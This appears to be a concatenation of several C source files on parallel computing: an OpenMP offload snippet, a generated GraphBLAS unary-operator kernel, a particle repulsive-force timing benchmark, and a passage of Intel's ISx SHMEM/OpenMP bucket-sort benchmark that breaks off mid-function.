// https://www.appentra.com/knowledge/checks/pwr026
int foo(int a) { return 2 * a; }
void example(int n, int *A) {
#pragma omp target teams distribute parallel for
for (int i = 0; i < n; i++) {
A[i] = foo(i);
}
}
|
GB_unop__identity_bool_uint32.c | //------------------------------------------------------------------------------
// GB_unop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2022, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCUDA_DEV
#include "GB_control.h"
#include "GB_atomics.h"
#include "GB_unop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB (_unop_apply__identity_bool_uint32)
// op(A') function: GB (_unop_tran__identity_bool_uint32)
// C type: bool
// A type: uint32_t
// cast: bool cij = (bool) aij
// unaryop: cij = aij
#define GB_ATYPE \
uint32_t
#define GB_CTYPE \
bool
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
uint32_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = x ;
// casting
#define GB_CAST(z, aij) \
bool z = (bool) aij ;
// cij = op (aij)
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
uint32_t aij = Ax [pA] ; \
/* Cx [pC] = op (cast (aij)) */ \
bool z = (bool) aij ; \
Cx [pC] = z ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_IDENTITY || GxB_NO_BOOL || GxB_NO_UINT32)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_apply__identity_bool_uint32)
(
bool *Cx, // Cx and Ax may be aliased
const uint32_t *Ax,
const int8_t *restrict Ab, // A->b if A is bitmap
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
if (Ab == NULL)
{
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
uint32_t aij = Ax [p] ;
bool z = (bool) aij ;
Cx [p] = z ;
}
}
else
{
// bitmap case, no transpose; A->b already memcpy'd into C->b
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!Ab [p]) continue ;
uint32_t aij = Ax [p] ;
bool z = (bool) aij ;
Cx [p] = z ;
}
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB (_unop_tran__identity_bool_uint32)
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t *restrict *Workspaces,
const int64_t *restrict A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
Repulsive_forces.c | #include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <sys/time.h>
#include <omp.h>
double get_walltime() {
struct timeval tp; gettimeofday(&tp, NULL);
return (double) (tp.tv_sec + tp.tv_usec * 1e-6);
}
void force_repulsion(int np, const double *pos, double L, double krepulsion, double *forces) {
int i, j;
double posi [3]; double rvec [3];
double s2, s, f;
// initialize forces to zero
for (i = 0; i < 3 * np; i++) {
forces[i] = 0.;
}
// loop over all pairs
for (i = 0; i < np; i++) {
posi[0] = pos[3 * i];
posi[1] = pos[3 * i + 1];
posi[2] = pos[3 * i + 2];
for (j = i + 1; j < np; j++) {
// compute minimum image difference
rvec[0] = remainder(posi[0] - pos[3 * j], L);
rvec[1] = remainder(posi[1] - pos[3 * j + 1], L);
rvec[2] = remainder(posi[2] - pos[3 * j + 2], L);
s2 = rvec [0]* rvec [0] + rvec [1]* rvec [1] + rvec [2]* rvec [2];
if (s2 < 4) {
s = sqrt(s2);
rvec[0] /= s;
rvec[1] /= s;
rvec[2] /= s;
f = krepulsion*(2. - s);
forces[3 * i] += f * rvec[0];
forces[3 * i + 1] += f * rvec[1];
forces[3 * i + 2] += f * rvec[2];
forces[3 * j] += -f * rvec[0];
forces[3 * j + 1] += -f * rvec[1];
forces[3 * j + 2] += -f * rvec[2];
}
}
}
}
void force_repulsion_Parallel(int np, const double *pos, double L, double krepulsion, double *forces) {
int i, j;
double posi [3]; double rvec [3];
double s2, s, f;
omp_set_num_threads(omp_get_num_threads());
// initialize forces to zero
#pragma omp parallel for schedule(static) private (i)
for (i = 0; i < 3 * np; i++) {
forces[i] = 0.;
}
// loop over all pairs
#pragma omp parallel for schedule(static) private (i, j, rvec, posi, s2, s, f) shared(np, L , krepulsion, pos, forces)
for (i = 0; i < np; i++) {
posi[0] = pos[3 * i];
posi[1] = pos[3 * i + 1];
posi[2] = pos[3 * i + 2];
for (j = i + 1; j < np; j++) {
// compute minimum image difference
rvec[0] = remainder(posi[0] - pos[3 * j], L);
rvec[1] = remainder(posi[1] - pos[3 * j + 1], L);
rvec[2] = remainder(posi[2] - pos[3 * j + 2], L);
s2 = rvec[0] * rvec[0] + rvec[1] * rvec[1] + rvec[2] * rvec[2];
if (s2 < 4) {
s = sqrt(s2);
rvec[0] /= s;
rvec[1] /= s;
rvec[2] /= s;
f = krepulsion*(2. - s);
#pragma omp critical(forces)
{
forces[3 * i] += f * rvec[0];
forces[3 * i + 1] += f * rvec[1];
forces[3 * i + 2] += f * rvec[2];
forces[3 * j] += -f * rvec[0];
forces[3 * j + 1] += -f * rvec[1];
forces[3 * j + 2] += -f * rvec[2];
}
}
}
}
}
int comparator(double *forces1, double *forces2, int np, double epsilon) {
for(int i = 0; i < 3 * np; i++) {
if(fabs(forces1[i] - forces2[i]) > epsilion) {
return 0;
}
}
return 1;
}
int main(int argc, char *argv[]) {
int i;
int np = 1000; // default number of particles
double phi = 0.3; // volume fraction
double krepulsion = 125.; // force constant
double *pos; double *forces1; double *forces2;
double L, time0 , time1;
double epsilon = 1e-10; // significance value to compare the forces.
if (argc > 1) {
np = atoi(argv[1]);
}
L = pow(4./3. * 3.1415926536 * np/phi, 1./3.);
// generate random particle positions inside simulation box
forces1 = (double *) malloc(3 * np * sizeof(double));
forces2 = (double *) malloc(3 * np * sizeof(double));
pos = (double *) malloc(3 * np * sizeof(double));
for (i = 0; i < 3 * np; i++) {
pos[i] = rand()/(double)RAND_MAX * L;
}
// measure sequential execution time of this function
time0 = get_walltime ();
force_repulsion(np, pos, L, krepulsion, forces1);
time1 = get_walltime ();
printf("number of particles: %d\n", np);
printf("sequential elapsed time: %f\n", time1 - time0);
// measure parallel execution time of this function
time0 = get_walltime ();
force_repulsion_Parallel(np, pos, L, krepulsion, forces2);
time1 = get_walltime ();
printf("parallel elapsed time: %f\n", time1 - time0);
int result = comparator(forces1, forces2, np, epsilon);
if(result == 1) {
printf("forces match\n");
}
else {
printf("forces do not match\n");
}
free(forces1);
free(forces2);
free(pos);
return 0;
}
|
isx.c | /*
Copyright (c) 2015, Intel Corporation
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of Intel Corporation nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
#include <shmem.h>
#include <assert.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/time.h>
#include <math.h>
#include <string.h>
#include <unistd.h> // sleep()
#include <sys/stat.h>
#include <stdint.h>
#include "params.h"
#include "isx.h"
#include "timer.h"
#include "pcg_basic.h"
#if defined(_OPENMP)
#include <omp.h>
#endif
#define ROOT_PE 0
// Needed for shmem collective operations
int pWrk[_SHMEM_REDUCE_MIN_WRKDATA_SIZE];
double dWrk[_SHMEM_REDUCE_SYNC_SIZE];
long long int llWrk[_SHMEM_REDUCE_MIN_WRKDATA_SIZE];
long pSync[_SHMEM_REDUCE_SYNC_SIZE];
uint64_t NUM_PES; // Number of parallel workers
uint64_t TOTAL_KEYS; // Total number of keys across all PEs
uint64_t NUM_KEYS_PER_PE; // Number of keys generated on each PE
uint64_t NUM_BUCKETS; // The number of buckets in the bucket sort
uint64_t BUCKET_WIDTH; // The size of each bucket
uint64_t MAX_KEY_VAL; // The maximum possible generated key value
volatile int whose_turn;
long long int receive_offset = 0;
long long int my_bucket_size = 0;
#define PARALLEL_FOR_MODE SHMEM_PARALLEL_FOR_RECURSIVE_MODE
#define CHUNKS_COUNT_LOCAL_KEYS (actual_num_workers)
#define CHUNKS_MAKE_INPUT CHUNKS_PER_PE
int actual_num_workers;
int** local_bucket_sizes_chunk;
int ** my_local_key_counts;
KEY_TYPE*** my_local_bucketed_keys_chunk;
int** local_bucket_offsets_chunk;
/*
* This variable sets the maximum number of chunks allowed
* to participate in computation per pe.
*/
int CHUNKS_PER_PE=1;
#define GET_VIRTUAL_RANK(rank, chunk) ((rank * actual_num_workers) + (chunk))
#define SHMEM_BARRIER_AT_START { timer_start(&timers[TIMER_BARRIER_START]); shmem_barrier_all(); timer_stop(&timers[TIMER_BARRIER_START]); }
#define SHMEM_BARRIER_AT_EXCHANGE { timer_start(&timers[TIMER_BARRIER_EXCHANGE]); shmem_barrier_all(); timer_stop(&timers[TIMER_BARRIER_EXCHANGE]); }
#define SHMEM_BARRIER_AT_END { timer_start(&timers[TIMER_BARRIER_END]); shmem_barrier_all(); timer_stop(&timers[TIMER_BARRIER_END]); }
// This is done due to current limitation that entrypoint function
// cannot accept arguments. This will be resolved in future version of
// AsyncSHMEM
int m_argc;
char** m_argv;
#define EXTRA_STATS
#ifdef EXTRA_STATS
float avg_time=0, avg_time_all2all = 0;
#endif
#define KEY_BUFFER_SIZE (1uLL<<28uLL)
// The receive array for the All2All exchange
KEY_TYPE* my_bucket_keys;
#ifdef PERMUTE
int * permute_array;
#endif
void entrypoint(void *arg) {
char * log_file = parse_params(m_argc, m_argv);
init_shmem_sync_array(pSync);
bucket_sort();
log_times(log_file);
//return err;
}
int main (int argc, char ** argv) {
shmem_init ();
m_argc = argc;
m_argv = argv;
#ifdef EXTRA_STATS
_timer_t stage_time;
if(shmem_my_pe() == 0) {
printf("\n-----\nmkdir timedrun fake\n\n");
timer_start(&stage_time);
}
#endif
#if defined(_SHMEM_WORKERS)
shmem_workers_init(entrypoint, NULL);
#else
entrypoint(NULL);
#endif
#ifdef EXTRA_STATS
if(shmem_my_pe() == 0) {
just_timer_stop(&stage_time);
double tTime = ( stage_time.stop.tv_sec - stage_time.start.tv_sec ) + ( stage_time.stop.tv_nsec - stage_time.start.tv_nsec )/1E9;
avg_time *= 1000;
avg_time_all2all *= 1000;
printf("\n============================ MMTk Statistics Totals ============================\n");
if(NUM_ITERATIONS == 1) { //TODO: fix time calculation below for more number of iterations
printf("time.mu\tt.ATA_KEYS\tt.MAKE_INPUT\tt.COUNT_BUCKET_SIZES\tt.BUCKETIZE\tt.COMPUTE_OFFSETS\tt.LOCAL_SORT\tBARRIER_AT_START\tBARRIER_AT_EXCHANGE\tBARRIER_AT_END\tnWorkers\tnPEs\n");
double TIMES[TIMER_NTIMERS];
memset(TIMES, 0x00, sizeof(double) * TIMER_NTIMERS);
for(uint64_t i=0; i<NUM_PES; i++) {
for(int t = 0; t < TIMER_NTIMERS; ++t){
if(timers[t].all_times != NULL){
TIMES[t] += timers[t].all_times[i];
}
}
}
for(int t = 0; t < TIMER_NTIMERS; ++t){
printf("%.3f\t", (TIMES[t]/NUM_PES)*1000);
}
printf("%d\t%d\n",actual_num_workers,NUM_PES);
printf("Total time: %.3f\n",(TIMES[0]/NUM_PES)*1000);
}
else {
printf("time.mu\ttimeAll2All\tnWorkers\tnPEs\n");
printf("%.3f\t%.3f\t%d\t%d\n",avg_time,avg_time_all2all,actual_num_workers,NUM_PES);
printf("Total time: %.3f\n",avg_time);
}
printf("------------------------------ End MMTk Statistics -----------------------------\n");
printf("===== TEST PASSED in %.3f msec =====\n",(tTime*1000));
}
#endif
shmem_finalize ();
return 0;
}
// Parses all of the command line input and definitions in params.h
// to set all necessary runtime values and options
static char * parse_params(const int argc, char ** argv)
{
if(argc != 3)
{
if( shmem_my_pe() == 0){
printf("Usage: \n");
printf(" ./%s <total num keys(strong) | keys per pe(weak)> <log_file>\n",argv[0]);
}
shmem_finalize();
exit(1);
}
const char* chunks_env = getenv("ISX_PE_CHUNKS");
CHUNKS_PER_PE = chunks_env ? atoi(chunks_env) : 1;
#if defined(_OPENMP)
#pragma omp parallel
actual_num_workers = omp_get_num_threads();
#elif defined(_SHMEM_WORKERS)
actual_num_workers = shmem_n_workers();
#else
CHUNKS_PER_PE = 1;
actual_num_workers = 1;
#endif
NUM_PES = (uint64_t) shmem_n_pes();
MAX_KEY_VAL = DEFAULT_MAX_KEY;
NUM_BUCKETS = NUM_PES;
BUCKET_WIDTH = (uint64_t) ceil((double)MAX_KEY_VAL/NUM_BUCKETS);
char * log_file = argv[2];
char scaling_msg[64];
switch(SCALING_OPTION){
case STRONG:
{
TOTAL_KEYS = (uint64_t) atoi(argv[1]);
NUM_KEYS_PER_PE = (uint64_t) ceil((double)TOTAL_KEYS/NUM_PES);
sprintf(scaling_msg,"STRONG");
break;
}
case WEAK:
{
NUM_KEYS_PER_PE = (uint64_t) (atoi(argv[1])) * actual_num_workers;
sprintf(scaling_msg,"WEAK");
break;
}
case WEAK_ISOBUCKET:
{
NUM_KEYS_PER_PE = (uint64_t) (atoi(argv[1])) * actual_num_workers;
BUCKET_WIDTH = ISO_BUCKET_WIDTH;
MAX_KEY_VAL = (uint64_t) (NUM_PES * actual_num_workers * BUCKET_WIDTH);
sprintf(scaling_msg,"WEAK_ISOBUCKET");
break;
}
default:
{
if(shmem_my_pe() == 0){
printf("Invalid scaling option! See params.h to define the scaling option.\n");
}
shmem_finalize();
exit(1);
break;
}
}
assert(NUM_KEYS_PER_PE % actual_num_workers == 0);
assert(MAX_KEY_VAL > 0);
assert(NUM_KEYS_PER_PE > 0);
assert(NUM_PES > 0);
assert(MAX_KEY_VAL > NUM_PES);
assert(NUM_BUCKETS > 0);
assert(BUCKET_WIDTH > 0);
if(shmem_my_pe() == 0){
printf("ISx v%1d.%1d\n",MAJOR_VERSION_NUMBER,MINOR_VERSION_NUMBER);
#ifdef PERMUTE
printf("Random Permute Used in ATA.\n");
#endif
printf(" Number of Keys per PE: %" PRIu64 "\n", NUM_KEYS_PER_PE);
printf(" Number of Chunks per PE (ISX_PE_CHUNKS): %d\n",CHUNKS_PER_PE);
#if defined(_OPENMP)
printf(" OpenMP Version, total workers: %d\n",actual_num_workers);
#elif defined(_SHMEM_WORKERS)
printf(" AsyncSHMEM Version, total workers: %d\n",actual_num_workers);
#else
printf(" AsyncSHMEM Sequential version\n");
#endif
printf(" Max Key Value: %" PRIu64 "\n", MAX_KEY_VAL);
printf(" Bucket Width: %" PRIu64 "\n", BUCKET_WIDTH);
printf(" Number of Iterations: %u\n", NUM_ITERATIONS);
printf(" Number of PEs: %" PRIu64 "\n", NUM_PES);
printf(" %s Scaling!\n",scaling_msg);
}
return log_file;
}
/*
* The primary compute function for the bucket sort
* Executes the sum of NUM_ITERATIONS + BURN_IN iterations, as defined in params.h
* Only iterations after the BURN_IN iterations are timed
* Only the final iteration calls the verification function
*/
static int bucket_sort(void)
{
int err = 0;
init_timers(NUM_ITERATIONS);
#ifdef PERMUTE
create_permutation_array();
#endif
my_bucket_keys = (KEY_TYPE*) shmem_malloc(KEY_BUFFER_SIZE * sizeof(KEY_TYPE));
my_local_key_counts = malloc(CHUNKS_COUNT_LOCAL_KEYS * sizeof(int*));
for(int i=0; i<CHUNKS_COUNT_LOCAL_KEYS; i++) my_local_key_counts[i] = malloc(BUCKET_WIDTH * sizeof(int));
for(uint64_t i = 0; i < (NUM_ITERATIONS + BURN_IN); ++i)
{
for(int i=0; i<CHUNKS_COUNT_LOCAL_KEYS; i++) memset(my_local_key_counts[i], 0x00, BUCKET_WIDTH * sizeof(int));
local_bucket_sizes_chunk = malloc(CHUNKS_PER_PE* sizeof(int*));
// Reset timers after burn in
if(i == BURN_IN){ init_timers(NUM_ITERATIONS); }
SHMEM_BARRIER_AT_START;
timer_start(&timers[TIMER_TOTAL]);
KEY_TYPE * my_keys = make_input();
int * local_bucket_sizes = count_local_bucket_sizes(my_keys);
int * send_offsets;
int * local_bucket_offsets = compute_local_bucket_offsets(local_bucket_sizes,
&send_offsets);
KEY_TYPE * my_local_bucketed_keys = bucketize_local_keys(my_keys, local_bucket_offsets);
KEY_TYPE * my_bucket_keys = exchange_keys(send_offsets,
local_bucket_sizes,
my_local_bucketed_keys);
my_bucket_size = receive_offset;
count_local_keys(my_bucket_keys);
SHMEM_BARRIER_AT_END;
timer_stop(&timers[TIMER_TOTAL]);
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
free(local_bucket_sizes_chunk[chunk]);
}
free(local_bucket_sizes_chunk);
// Only the last iteration is verified
if(i == NUM_ITERATIONS) {
err = verify_results(my_bucket_keys);
}
// Reset receive_offset used in exchange_keys
receive_offset = 0;
free(my_local_bucketed_keys);
free(my_keys);
free(local_bucket_sizes);
free(local_bucket_offsets);
free(send_offsets);
shmem_barrier_all();
}
for(int i=0; i<CHUNKS_COUNT_LOCAL_KEYS; i++) free(my_local_key_counts[i]);
free(my_local_key_counts);
return err;
}
#if defined(_SHMEM_WORKERS)
void make_input_async(void *args, int chunk) {
KEY_TYPE * restrict const my_keys = *((KEY_TYPE **) args);
const uint64_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_MAKE_INPUT;
const uint64_t start_index = chunk * keys_per_chunk;
const uint64_t max_index = start_index + keys_per_chunk;
pcg32_random_t rng = seed_my_chunk(chunk);
KEY_TYPE * restrict my_keys_1D = &(my_keys[start_index]);
for(uint64_t i=start_index; i<max_index; i++) {
*my_keys_1D = pcg32_boundedrand_r(&rng, MAX_KEY_VAL);
my_keys_1D += 1;
}
}
#endif
/*
* Generates uniformly random keys [0, MAX_KEY_VAL] on each rank using the time and rank
* number as a seed
*/
static KEY_TYPE * make_input(void)
{
timer_start(&timers[TIMER_INPUT]);
KEY_TYPE * restrict const my_keys = malloc(NUM_KEYS_PER_PE * sizeof(KEY_TYPE));
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_MAKE_INPUT;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
shmem_task_scope_begin();
shmem_parallel_for_nbi(make_input_async, (void*)(&my_keys), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
#if defined(_OPENMP)
int chunk;
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<CHUNKS_MAKE_INPUT; chunk++) {
const uint64_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_MAKE_INPUT;
const uint64_t start_index = chunk * keys_per_chunk;
const uint64_t max_index = start_index + keys_per_chunk;
pcg32_random_t rng = seed_my_chunk(chunk);
KEY_TYPE * restrict my_keys_1D = &(my_keys[start_index]);
for(uint64_t i=start_index; i<max_index; i++) {
*my_keys_1D = pcg32_boundedrand_r(&rng, MAX_KEY_VAL);
my_keys_1D += 1;
}
}
#endif
timer_stop(&timers[TIMER_INPUT]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: Initial Keys: ", my_rank);
for(uint64_t i = 0; i < NUM_KEYS_PER_PE; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", my_keys[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return my_keys;
}
#if defined(_SHMEM_WORKERS)
void count_local_bucket_sizes_async(void* args, int chunk) {
KEY_TYPE const * restrict const my_keys = (KEY_TYPE *) args;
local_bucket_sizes_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_sizes_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
int * restrict const local_bucket_sizes = local_bucket_sizes_chunk[chunk];
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const uint32_t bucket_index = my_keys_1D[i]/BUCKET_WIDTH;
local_bucket_sizes[bucket_index]++;
}
}
#endif
/*
* Computes the size of each bucket by iterating all keys and incrementing
* their corresponding bucket's size
*/
static inline int * count_local_bucket_sizes(KEY_TYPE const * restrict const my_keys)
{
int * restrict const local_bucket_sizes = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_sizes, 0x00, NUM_BUCKETS * sizeof(int));
timer_start(&timers[TIMER_BCOUNT]);
init_array(local_bucket_sizes, NUM_BUCKETS);
if(NUM_BUCKETS == 1) {
local_bucket_sizes[0] = NUM_KEYS_PER_PE;
}
else {
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_PER_PE;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
shmem_task_scope_begin();
shmem_parallel_for_nbi(count_local_bucket_sizes_async, (void*)(my_keys), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
#if defined(_OPENMP)
int chunk;
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
local_bucket_sizes_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_sizes_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
int * restrict const local_bucket_sizes = local_bucket_sizes_chunk[chunk];
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const uint32_t bucket_index = my_keys_1D[i]/BUCKET_WIDTH;
local_bucket_sizes[bucket_index]++;
}
}
#endif
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
for(int i=0; i<NUM_BUCKETS; i++) {
local_bucket_sizes[i] += local_bucket_sizes_chunk[chunk][i];
}
}
}
timer_stop(&timers[TIMER_BCOUNT]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: local bucket sizes: ", my_rank);
for(uint64_t i = 0; i < NUM_BUCKETS; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", local_bucket_sizes[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return local_bucket_sizes;
}
/*
* Computes the prefix scan of the bucket sizes to determine the starting locations
* of each bucket in the local bucketed array
* Stores a copy of the bucket offsets for use in exchanging keys because the
* original bucket_offsets array is modified in the bucketize function
*/
static inline int * compute_local_bucket_offsets(int const * restrict const local_bucket_sizes,
int ** restrict send_offsets)
{
int * restrict const local_bucket_offsets = malloc(NUM_BUCKETS * sizeof(int));
timer_start(&timers[TIMER_BOFFSET]);
(*send_offsets) = malloc(NUM_BUCKETS * sizeof(int));
// NOTE: This is a very small computation and hence we are not parallelizing this
local_bucket_offsets[0] = 0;
(*send_offsets)[0] = 0;
int temp = 0;
for(uint64_t i = 1; i < NUM_BUCKETS; i++){
temp = local_bucket_offsets[i-1] + local_bucket_sizes[i-1];
local_bucket_offsets[i] = temp;
(*send_offsets)[i] = temp;
}
timer_stop(&timers[TIMER_BOFFSET]);
#ifdef DEBUG
wait_my_turn();
char msg[1024];
const int my_rank = shmem_my_pe();
sprintf(msg,"Rank %d: local bucket offsets: ", my_rank);
for(uint64_t i = 0; i < NUM_BUCKETS; ++i){
if(i < PRINT_MAX)
sprintf(msg + strlen(msg),"%d ", local_bucket_offsets[i]);
}
sprintf(msg + strlen(msg),"\n");
printf("%s",msg);
fflush(stdout);
my_turn_complete();
#endif
return local_bucket_offsets;
}
#if defined(_SHMEM_WORKERS)
void bucketize_local_keys_async(void* args, int chunk) {
KEY_TYPE const * restrict const my_keys = (KEY_TYPE*) args;
my_local_bucketed_keys_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(KEY_TYPE*));
local_bucket_offsets_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_offsets_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
my_local_bucketed_keys_chunk[chunk][bucket] = malloc(sizeof(KEY_TYPE) * local_bucket_sizes_chunk[chunk][bucket]);
}
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
int * restrict local_bucket_offsets_chunk_1D = local_bucket_offsets_chunk[chunk];
int const * restrict const local_bucket_sizes_chunk_1D = local_bucket_sizes_chunk[chunk];
KEY_TYPE** restrict my_local_bucketed_keys_chunk_2D = my_local_bucketed_keys_chunk[chunk];
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const KEY_TYPE key = my_keys_1D[i];
const uint32_t bucket_index = key / BUCKET_WIDTH;
uint32_t index = local_bucket_offsets_chunk_1D[bucket_index]++;
assert(index < local_bucket_sizes_chunk_1D[bucket_index]);
my_local_bucketed_keys_chunk_2D[bucket_index][index] = key;
}
}
#endif
/*
* Places local keys into their corresponding local bucket.
* The contents of each bucket are not sorted.
*/
static inline KEY_TYPE * bucketize_local_keys(KEY_TYPE const * restrict const my_keys,
int * restrict const local_bucket_offsets)
{
KEY_TYPE * restrict const my_local_bucketed_keys = malloc(NUM_KEYS_PER_PE * sizeof(KEY_TYPE));
timer_start(&timers[TIMER_BUCKETIZE]);
my_local_bucketed_keys_chunk = malloc(CHUNKS_PER_PE* sizeof(KEY_TYPE**));
local_bucket_offsets_chunk = (int**) malloc(CHUNKS_PER_PE* sizeof(int*));
#if defined(_SHMEM_WORKERS)
int lowBound = 0;
int highBound = CHUNKS_PER_PE;
int stride = 1;
int tile_size = 1;
int loop_dimension = 1;
shmem_task_scope_begin();
shmem_parallel_for_nbi(bucketize_local_keys_async, (void*)(my_keys), NULL, lowBound, highBound, stride, tile_size, loop_dimension, SHMEM_PARALLEL_FOR_FLAT_MODE);
shmem_task_scope_end();
#else
#if defined(_OPENMP)
int chunk;
#pragma omp parallel for private(chunk) schedule (dynamic,1)
#endif
for(chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
my_local_bucketed_keys_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(KEY_TYPE*));
local_bucket_offsets_chunk[chunk] = malloc(NUM_BUCKETS * sizeof(int));
memset(local_bucket_offsets_chunk[chunk], 0x00, NUM_BUCKETS * sizeof(int));
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
my_local_bucketed_keys_chunk[chunk][bucket] = malloc(sizeof(KEY_TYPE) * local_bucket_sizes_chunk[chunk][bucket]);
}
const uint32_t keys_per_chunk = NUM_KEYS_PER_PE / CHUNKS_PER_PE;
const uint32_t start_index = chunk * keys_per_chunk;
KEY_TYPE const * restrict const my_keys_1D = &(my_keys[start_index]);
int * restrict local_bucket_offsets_chunk_1D = local_bucket_offsets_chunk[chunk];
int const * restrict const local_bucket_sizes_chunk_1D = local_bucket_sizes_chunk[chunk];
KEY_TYPE** restrict my_local_bucketed_keys_chunk_2D = my_local_bucketed_keys_chunk[chunk];
for(uint64_t i = 0; i < keys_per_chunk; ++i){
const KEY_TYPE key = my_keys_1D[i];
const uint32_t bucket_index = key / BUCKET_WIDTH;
uint32_t index = local_bucket_offsets_chunk_1D[bucket_index]++;
assert(index < local_bucket_sizes_chunk_1D[bucket_index]);
my_local_bucketed_keys_chunk_2D[bucket_index][index] = key;
}
}
#endif
for(int bucket=0; bucket<NUM_BUCKETS; bucket++) {
uint32_t index = local_bucket_offsets[bucket];
for(int chunk=0; chunk<CHUNKS_PER_PE; chunk++) {
memcpy(&(my_local_bucketed_keys[index]), my_local_bucketed_keys_chunk[chunk][bucket], sizeof(KEY_TYPE) * local_bucket_sizes_chunk[chunk][bucket]);
index += local_bucket_sizes_chunk[chunk][bucket];
}
local_bucket_offsets[bucket] = index;
}
